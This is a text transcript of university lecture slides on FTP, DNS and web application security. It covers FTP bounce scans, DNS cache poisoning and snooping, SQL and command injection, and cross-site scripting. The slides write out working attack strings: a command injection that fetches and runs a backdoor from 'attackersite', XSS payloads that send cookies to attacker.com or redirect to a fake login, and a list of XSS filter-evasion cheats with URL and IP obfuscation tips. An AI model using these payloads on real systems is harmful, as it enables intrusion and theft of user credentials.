Transcript Passive FTP
Application Layer Security Lecture 8 Supakorn Kungpisdan [email protected] NETE4630 1 Outline FTP Security DNS Security Web Application Security NETE4630 2 FTP Security Issues All traffic is transmitted in clear text Weak configuration on FTP allows brute force and dictionary attacks Anonymous access may be enabled to FTP server If file permissions are not set, an anonymous user may be able to read, overwrite, or delete files, leading to loss of confidentiality, integrity, and availability of data If anonymous access is being used on a server, make sure that the proper restrictions are enforced for this user NETE4630 3 Types of FTP Active FTP Control connection is initiated by FTP client Data connection is initiated by FTP server Passive FTP Control connection is initiated by FTP client Data connection is initiated by FTP client NETE4630 Advanced Network Security and Implementation 4 Active FTP 1. The client connects from a random unprivileged port (N > 1023) to the FTP server's command port, port 21. The client also sends the FTP command PORT N+1 from port N to port 21 at the FTP server. The client then starts listening to port N+1 2. Server returns the response from port 21 to port N at the client 3. The server will then connect back to the client's specified data port from its local data port (port 20) to the client at port N+1 Ref: http://slacksite.com/other/ftp.html NETE4630 5 Active FTP (cont.) debug Client port = (14*256)+178 = 3762 Letters in red shows client input Letters in black shows server output NETE4630 6 Active FTP (cont.) 1. The client's command port contacts the server's command port (port 21) and sends the command PORT 1027 (N+1). 2. The server sends an ACK back from its port 21 to the client's command port (port 1026 port N). the server initiates a connection on its local data port (port 20) to the data port the client specified earlier (port 1027). The client sends an ACK back from port 1027 to the server port 20. 3. 4. NETE4630 7 Firewall VS Active FTP From the server-side firewall's standpoint, to support active mode FTP the following communication channels need to be opened: FTP server's port 21 from anywhere (Client initiates connection) FTP server's port 21 to ports > 1023 (Server responds to client's control port) FTP server's port 20 to ports > 1023 (Server initiates data connection to client's data port) FTP server's port 20 from ports > 1023 (Client sends ACKs to server's data port) NETE4630 8 Problems of Active FTP The FTP client doesn't make the actual connection to the data port of the server The FTP client simply tells the server what port it is listening on (N+1) and waits for the server to connect back to the specified port on the client. From the client-side stateful firewall, this appears to be an outside system initiating a connection to an internal client This connection may be blocked Because the server initiates the data connection, the server may connects to different client NETE4630 9 Passive FTP To solve the problem of active FTP, use passive FTP When opening an FTP connection, the client opens two random unprivileged ports locally (N>1023 and N+1). The port N contacts the server on port 21, but instead of then issuing a PORT command and allowing the server to connect back to its data port, the client will issue the PASV command. The server then opens a random unprivileged port (P > 1023) and sends the PORT P command back to the client. The client then initiates the connection from port N+1 to port P on the server to transfer data. NETE4630 10 Passive FTP (cont.) Client port = (195*256)+149 = 50069 Server specifies port number NETE4630 11 Passive FTP 1. The client contacts the server on the command port (port N=1026) and issues the PASV command. 2. The server then replies with PORT 2024, telling the client which port it is listening to for the data connection. 3. The client then initiates the data connection from its data port (N+1=1027) to the specified server data port (port 2024). 4. The server sends back an ACK (from its port 2024) to the client's data port (port 1027). You can see that client initiates data connection with FTP server will not be blocked by the firewall NETE4630 12 Firewall VS Passive FTP From the server-side firewall's standpoint, to support passive FTP, the following communication channels need to be opened: FTP server's port 21 from anywhere (Client initiates connection) FTP server's port 21 to ports > 1023 (Server responds to client's control port) FTP server's ports > 1023 from anywhere (Client initiates data connection to random port specified by server) FTP server's ports > 1023 to remote ports > 1023 (Server sends ACKs (and data) to client's data port) NETE4630 13 Problems of Passive FTP The FTP server needs to allow remote connection to high numbered ports on the server. Fortunately, many FTP daemons, including the popular WUFTPD allow the administrator to specify a range of ports which the FTP server will use. Some FTP clients do (or do not) support passive mode. NETE4630 14 FTP Bounce Scan The FTP bounce attack uses a third workstation to act as a proxy between the nmap host and the destination station. With passive FTP, a user could send a PORT command to an FTP server that would direct the data towards a completely different host! The FTP bounce attack takes advantage of these poorlyconfigured FTP servers (no control over ranges of FTP ports) The data is BOUNCED from FTP server to target host NETE4630 15 FTP Bounce Scan (cont.) Closed port Open port NETE4630 16 Advantages of FTP Bounce Scan FTP bounce attack can scan "through" a firewall. The FTP bounce attack uses standard FTP functionality. Nmap does not require specialized packet configurations or changes to the FTP protocol. Therefore, the FTP bounce attack does not require any privileged access. NETE4630 17 Disadvantages of FTP Bounce Scan FTP bounce attack relates to the availability of an FTP server that allows a PORT command to redirect the data connection to a third device. Most FTP servers have their default configuration to protect against this use of the PORT command NETE4630 18 Other FTP Bounce Attack When using active FTP, a client uses the PORT command to specify the IP address and port number that the server should connect to for data connection An attacker with access to an FTP server can bounce through the server by specifying someone else’s IP address NETE4630 19 Outline FTP Security DNS Security Web Application Security NETE4630 20 Domain Name System DNS is a distributed database that holds information for mapping between host names to IP addresses DNS uses both UDP and TCP. UDP is typically used for queries, unless the lookup or response is greater than 512 bytes TCP is used for lookups and for zone transfer Integrity and availability of DNS is critical for the health of the Internet. It is used in conjunction with almost every other protocol on the Internet Availability was considered while designing DNS, however, security was not NETE4630 21 DNS Request NETE4630 22 DNS Response NETE4630 23 DNS Lookup Process 1 2 Host A Host A’s Authoritative name server 1. Host A sends a request to resolver (at host A). It checks the local cache and may check hosts file 2. The resolver at Host A forwards the request to its authoritative name server NETE4630 24 DNS Non-recursive Query 1 Host A’s Authoritative name server 2 3 4 Host A Host B’s Authoritative name server Host B 5 3. Find the address of authoritative name server of the requested domain and returns its address to the resolver NETE4630 25 DNS Recursive Query 1 2 Host A’s Authoritative name server 5 3 Host A Host B’s Authoritative name server 4 Host B 3. The server finds the address of authoritative name server of the requested domain, passes the request on to the server, and returns a response to the resolver NETE4630 26 DNS Recursive Query (cont.) NETE4630 Advanced Network Security and Implementation 27 DNS Hierarchy (Recursive Query) .com TLD server 5 4 3 1. Recursive query 2. non-recursive query 6 2 7 What happens if (2) is recursive query? 1 8 NETE4630 28 DNS Utilities Most OSes come with a tool called nslookup, capable of querying DNS servers for various types of information The dig tool coming with UNIX has similar capabilities NETE4630 29 Name-to-IP Lookup NETE4630 30 MX Lookup with nslookup NETE4630 31 DNS Security Issues DNS is lack of authentication and integrity checking Due to the lack of authentication, attackers can spoof DNS messages to perform a variety of attacks Due to the lack of integrity checking, attackers can intercept and modify messages in transit NETE4630 32 DNS Zone Transfer For redundancy, administrators deploy both primary and secondary name servers that contain the same DBs To keep the DBs synchronized with the primary name server, the secondary name server periodically connects to the primary name server on port 53/TCP and grabs the DNS records This process is called a Zone Transfer NETE4630 33 DNS Information Gathering DNS can provide a great deal of information about the target network and its hosts One of the common insecure configurations with DNS is allowing anyone to perform zone transfers on one of a domain’s DNS servers If an attacker can perform a zone transfer with the primary or secondary name servers for a domain, he/she will be able to view all DNS records for that domain See a demo at http://www.mindterra.com/blog/?p=179 Solved by specifying IP address that is allowed to perform the zone transfer or using Transaction Signature (TSIG) NETE4630 34 DNS Cache Poisoning Both DNS client and servers cache responses for a period of time in order to increase performance and reduce network traffic If an attacker can spoof a response for a DNS request, he/she may be able to contaminate the DNS cache with an incorrect record This process is known as DNS cache poisoning The only real defense built into DNS is the use of a random Transaction ID and source port Some versions of BIND use Transaction IDs that are not sufficiently random, and some use sequential Transaction IDs BIND 9 Cache Poisoning NETE4630 35 DNS Cache Poisoning Example http://www.ipa.go.jp/security/english/vuln/200809_DNS_en.html NETE4630 Advanced Network Security and Implementation 36 How to Check for the Vulnerability To see if one's own DNS server has a DNS cache poisoning vulnerability, the operator should ask three questions. If any of them are positive, the DNS cache server is left unpatched or has a problem in its configuration. Port number used by DNS queries is not randomized ID number used for DNS queries is not randomized DNS server is allowed to reply to recursive DNS queries originated from the outside http://www.ipa.go.jp/security/english/vuln/200809_DNS_en.html NETE4630 Advanced Network Security and Implementation 37 Checking Port Randomness If randomization of the port number used by DNS queries is insufficient, the risk of the server getting poisoned becomes higher. Try a web-based DNS Randomness test tool https://www.dns-oarc.net/oarc/services/dnsentropy http://www.ipa.go.jp/security/english/vuln/200809_DNS_en.html NETE4630 Advanced Network Security and Implementation 38 Web-based DNS Randomness Test NETE4630 Advanced Network Security and Implementation 39 Web-based DNS Randomness Test (cont.) NETE4630 Advanced Network Security and Implementation 40 Check Transaction ID Randomness If randomization of the ID number for DNS queries is insufficient, the risk of the server getting poisoned becomes higher. NETE4630 Advanced Network Security and Implementation 41 Checking Recursive Query Replies Essentially, a DNS server (DNS content server) should not reply to recursive DNS queries originated from the outside. Even if the server also acts as a DNS cache server, it should be limited to those originated within the domain. The operator could use the “Cross-Pollination Scan” tool by IANA to check the DNS server for the issue C. Specify the domain name(s) owned by the organization and send a test query http://recursive.iana.org/ http://www.ipa.go.jp/security/english/vuln/200809_DNS_en.html NETE4630 Advanced Network Security and Implementation 42 Checking Recursive Query Replies NETE4630 Advanced Network Security and Implementation 43 DNS Cache Snooping Recursion bit tells the DNS server whether it is recursive or non-recursive query The remote DNS server may answer to queries for 3rd party domains which do not have the recursion bit set. This may allow a remote attacker to determine which domains have recently been resolved via this name server, and therefore which hosts have been recently visited. Ref: www.rootsecure.net/content/downloads/pdf/dns_cache_snooping.pdf NETE4630 44 Possible Scenario If an attacker was interested in whether your company utilizes the online services of a particular bank, they can use this attack to build a statistical model regarding company usage of the bank mentioned above. This attack can also be used to find B2B partners, websurfing patterns, external mail servers, and more... Two techniques are available: using non-recursive queries and using recursive queries Some DNS allows both types of queries, but some allows only recursive queries to be made NETE4630 45 DNS Cache Snooping with Non-recursive Queries Attacker queries to ns1.tvcabo.pt for www.sidestep.pt ns1.tvcabo.pt does not have the entry in local cache. It returns no answer, but gives a list of .pt TLD name server for further question NETE4630 46 DNS Cache Snooping with Non-recursive Queries (cont.) The fact that ns1.tvcabo.pt does not have the entry in local cache means that all hosts under ns1.tvcabo.pt never communicates with www.sidestep.pt before. Thus, this organization does not use services provided by www.sidestep.pt NETE4630 47 DNS Cache Snooping with Non-recursive Queries (cont.) If the attacker executes the same query, check the response For this time, ns1.tvcabo.pt caches the entry, so it returns the answer NETE4630 48 DNS Cache Snooping with Recursive Queries Used to determine with some degree of precision (not 100% sure) whether a given record is present in the cache However, this will pollute the cache If a given record is not present in the cache, it will be after the first query is made This is because recursive query will always return the answer for the given record NETE4630 49 DNS Cache Snooping with Recursive Queries Try to see if www.sidestep.pt was cached in ns1.tvcabo.pt Query ns1.tvcabo.pt for www.sidestep.pt and record the TTL NETE4630 50 DNS Cache Snooping with Recursive Queries (cont.) Then query to ns.sidestep.pt (Sidestep.com’s authoritative DNS) for www.sidestep.com and compare TTL NETE4630 51 DNS Cache Snooping with Recursive Queries (cont.) TTL for www.sidestep.pt at ns1.tvcabo.pt (6458) is much lower than the initial TTL (86400) (the TTL at ns.sidestep.pt) This is a good indicator that the answer was already cached at ns1.tvcabo.pt Another way to look for cached responses is to observe the time that the query takes to process. If the query time is approximately equal to the round trip time (RTT) of a packet to the server, then the answer might have been already present in the cache. NETE4630 52 A Safer BIND Configuration NETE4630 53 Outline FTP Security DNS Security Web Application Security NETE4630 54 Attacking Web Applications The majority of vulnerabilities are caused by a lack of proper input validation by the application before processing user-supplied data This can allow attackers to disclose information about the site, steal information from backend DBs, or execute binary code on the web server NETE4630 55 SQL Injection Many web applications rely on backend DBs for information storage and retrieval. Sometimes a script will perform a DB query using input supplied from a web page, without verifying that the input does not contain any escape characters Consider the following: Query = “SELECT * FROM users WHERE username = ‘{$_POST[‘user’]}’ AND password = ‘{$_POST[‘pass’]}’ ”; “SELECT * FROM users WHERE username = ‘bob’ AND password = ‘ ’ OR 1=1 ”; NETE4630 56 Code Injection Sometimes user-supplied strings are not properly checked for escape characters before being passed to commands as arguments Consider a PHP script that takes a string supplied from web page form and passes it to the nslookup utility NETE4630 57 Code Injection (cont.) If supply ;ls / -la, the script will execute the command nslookup;la / -la, resulting in a listing of the root directory being printed out NETE4630 58 Code Injection (cont.) wget and perl commands could be used to download and run a backdoor on the web server by supplying the following line to the script ;wget http://attackersite/backdoor.pl;perl backdoor.pl NETE4630 59 Cross-Site Scripting (XSS) XSS vulnerabilities allow attackers to inject code or HTML into a web page that will be executed when a different user visits that page These attacks target visitors to a web site, not the site itself, and occur when a web page does not properly sanitize user input before using it in output As a matter of fact in vulnerable websites is possible to execute HTML and JavaScript codes from a not sanitized form, which combined can be really dangerous: it's possible to steal cookies or to redirect web pages to build fake login in order to steal login usernames and passwords. NETE4630 60 Types of XSS The term XSS is actually a bit elusive because it includes different kinds of attacks that stands each other on different attacking mechanisms. There are actually three types of Cross-Site Scripting, commonly named as: DOM-Based XSS Non-persistent XSS Persistent XSS Ref: http://www.milw0rm.com/papers/146 http://en.wikipedia.org/wiki/Cross_Site_Scripting NETE4630 61 DOM-based XSS DOM-based or Type 0 XSS vulnerability, also referred to as local XSS, is based on the standard object model for representing HTML or XML called the Document Object Model or DOM for short. The DOM-Based XSS allows to an attacker to work not on a victim website but on a victim local machine NETE4630 62 DOM-based XSS (cont.) Hacker executes command on the downloaded page with user’s privilege on the machine Attacker creates website containing malicious code User downloads malicious page by clicking on a link in an email, etc. NETE4630 Advanced Network Security and Implementation 63 DOM-based XSS (cont.) 1. The attacker creates a well-built malicious website - The ingenuous user opens that site 2. The user has a vulnerable page on his machine 3. The attacker's website sends commands to the vulnerable HTML page 4. The vulnerable local page execute that commands with the user's privileges on that machine 5. The attacker easily gain control on the victim computer. NETE4630 64 DOM-based XSS Solutions DOM-based XSS is really dangerous because it operates on the victim system strictly and as long as the user doesn't look after his/her security issues and doesn't apply updates, the DOM-Based XSS will work fine. To prevent this kind of attacks there are only two things to take care of: Do not visit untrusted website Keep your system up to date NETE4630 65 Non-persistent XSS The non-persistent or Type 1 XSS is also referred to as a reflected vulnerability, and is by far the most common type. It shows up when data provided by a web client is used immediately by server-side scripts to generate a page of results for that user. If unvalidated user-supplied data is included in the resulting page without HTML encoding, this will allow client-side code to be injected into the dynamic page The attacker could provide some malicious code and try to make the server execute it in order to obtain some result. NETE4630 66 Non-persistent XSS: Search Engine Attacker writes some arbitrary HTML code in the search textbox and, if the website is vulnerable, the result page will return the result of these HTML entities. If this happens at 99% the Search engine will execute also JavaScript arbitrary code. NETE4630 67 Non-persistent XSS Example: Search Engine 1. Assure that a website works like this: http://www.example.com/search.php?text=TEXTTOSEAR CH 2. Try to include some HTML tags in the "text" variable: http://www.example.com/search.php?text=<img src="http://attacker.com/image.jpg"> If the website is vulnerable it will display the attacker's image into the result webpage. NETE4630 68 Example (cont.) 3. Try then to write some JavaScript code: http:///www.example.com/search.php?text=<script> alert(document.cookie)</script> Probably the website will return an alert popup with the current Cookie for the site itself. NETE4630 69 Example (cont.) This vulnerability can be used by the attacker to steal information to users of the victim website providing them for example an email with an URL like: http://www.victim.com/search.php?text=MALICIOUSCODE To make that url less suspicious it will be useful to encode the code in URL Hex value For example the code: <script>alert("XSS")</script> Encoded will look like: %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%58%53%53% 22%29%3B%3C %2F%73%63%72%69%70%74%3E NETE4630 70 Example (cont.) And as comes the malicious url will turn from: http://www.victim.com/search.php?text=<script>aler t("XSS")</script> Into: http://www.victim.com/search.php?text=%3C%73%63%72 %69%70%74%3E%61%6C%65%72%74%28%22 %58%53%53%22%29%3B%3C%2F%73%63%72%69%70%74%3E Which, for a clueless user, it's lot less suspicious than the first one. NETE4630 71 Example (cont.) http://www.victim.com/search.php?text=%3C%73%63%72%69%70 %74%3E%61%6C%65%72%74%28%22 %58%53%53%22%29%3B%3C%2F%73%63%72%69%70%74%3E Fake login The fake login steals the username and password of the victim NETE4630 Advanced Network Security and Implementation 72 Example (cont.) 1. The attacker realizes that the victim website is vulnerable to XSS 2. The attacker creates on his website an ad-hoc page which is used to steal sensible information, e.g. Cookies, or to make a fake login of the victim website. 3. The attacker provides to a user a crafted URL containing a malicious code like: http://www.victim.com/search.php?text= <script>document.location("http://attackersite.com/fake login.php")</script> Encoded in Hex. 4. The user visits the web page and is obscurely redirect the attacker's fakelogin 5. The user is invited to log into the system and he does. 6. The fake login steals the username and password of the victim. NETE4630 73 Persistent XSS The persistent XSS is similar to non-persistent XSS Both works on a victim site and tries to hack user information However, attacker doesn't need to provide the crafted URL to the users Because the website itself permits to users to insert fixed data into the system This is the case for example of "guestbooks" Usually the users use that kind of tool to leave messages to the owned of the website An attacker can insert some malicious code in his message and let ALL visitors to be victim of that. NETE4630 74 Persistent XSS (cont.) Attacker posts the following code: <img src="javascript:document.location ('http://attacker.com/steal.php?cookie=' . encodeURI(document.cookie));"> Attacker can steal the user’s cookies or steal session NETE4630 Advanced Network Security and Implementation 75 Exploit Scenario 1. Bob hosts a web site allowing users to post messages and other content to the site for later viewing by other members. 2. Mallory notices that Bob's website is vulnerable to a type 2 XSS attack. 3. Mallory posts a message, controversial in nature, which may encourage many other users of the site to view it. 4. Upon merely viewing the posted message, site users' session cookies or other credentials could be taken and sent to Mallory's web server without their knowledge. 5. Later, Mallory logs in as other site users and posts messages on their behalf.... NETE4630 76 Exploit Scenario (cont.) This works when the tool provided (the guestbook in the example) doesn't do any check on the content of the inserted message: it just inserts the data provided from the user into the result page. The attacker could easily insert as much code as he wants into the tool, for example: <img src="javascript:document.location ('http://attacker.com/steal.php?cookie=' . encodeURI(document.cookie));"> This allows the attacker to steal the cookie of the victim user. NETE4630 77 More about XSS In order to make the attack less suspicious it's possible to "obfuscate" the IP address of the attacker's website, encoding the IP address with three formats: Dword Address Hex Address Octal Address For example the IP address 127.0.0.1 will look like: Dword: 2130706433 Hex: 0x7f.0x00.0x00.0x01 Octal: 0177.0000.0000.0001 Try for example: http://0x7f.0x00.0x00.0x01/ and it will open your localhost web server. NETE4630 78 Possible XSS Cheats <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC="javascri 0;t :alert('PL&# x41;YH ACK.NET')"> <IMG SRC="javascript:alert(String.fromCharCode(88,83,83))"> <SCRIPT/XSS SRC="http://example.com/xss.js"></SCRIPT> <<SCRIPT>alert("XSS");//<</SCRIPT> <iframe src=http://example.com/scriptlet.html < <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <BODY BACKGROUND="javascript:alert('XSS')"> <BODY ONLOAD=alert(document.cookie)> <IMG DYNSRC="javascript:alert('XSS')"> NETE4630 79 Possible XSS Cheats (cont.) <IMG DYNSRC="javascript:alert('XSS')"> <BR SIZE="&{alert('XSS')}"> <IMG SRC='vbscript:msgbox("XSS")'> <TABLE BACKGROUND="javascript:alert('XSS')"> <DIV STYLE="width: expression(alert('XSS'));"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <STYLE TYPE="text/javascript">alert('XSS');</STYLE> <STYLE type="text/css">BODY{background:url("javascript:alert(' XSS')")}</STYLE> <?='<SCRIPT>alert("XSS")</SCRIPT>'?> <A HREF="javascript:document.location='http://www.example. com/'">XSS</A> NETE4630 80 Information Disclosure An error page can discloses the path of thee web server’s root directory The path disclosure can aid attackers performing reconnaissance on the site phpinfo.php, part of a default PHP install, is a script providing the OS and software version on the host and other related information Google for inurl:phpinfo.php to see exactly how much information is leaked NETE4630 81 Question? Next week People Layer Security NETE4630 82 Questions 1. Find out how to configure a firewall to allow: 1. Active FTP 2. Passive FTP 2. Suggest a technique to ensure authentication and integrity to DNS NETE4630 Advanced Network Security and Implementation 83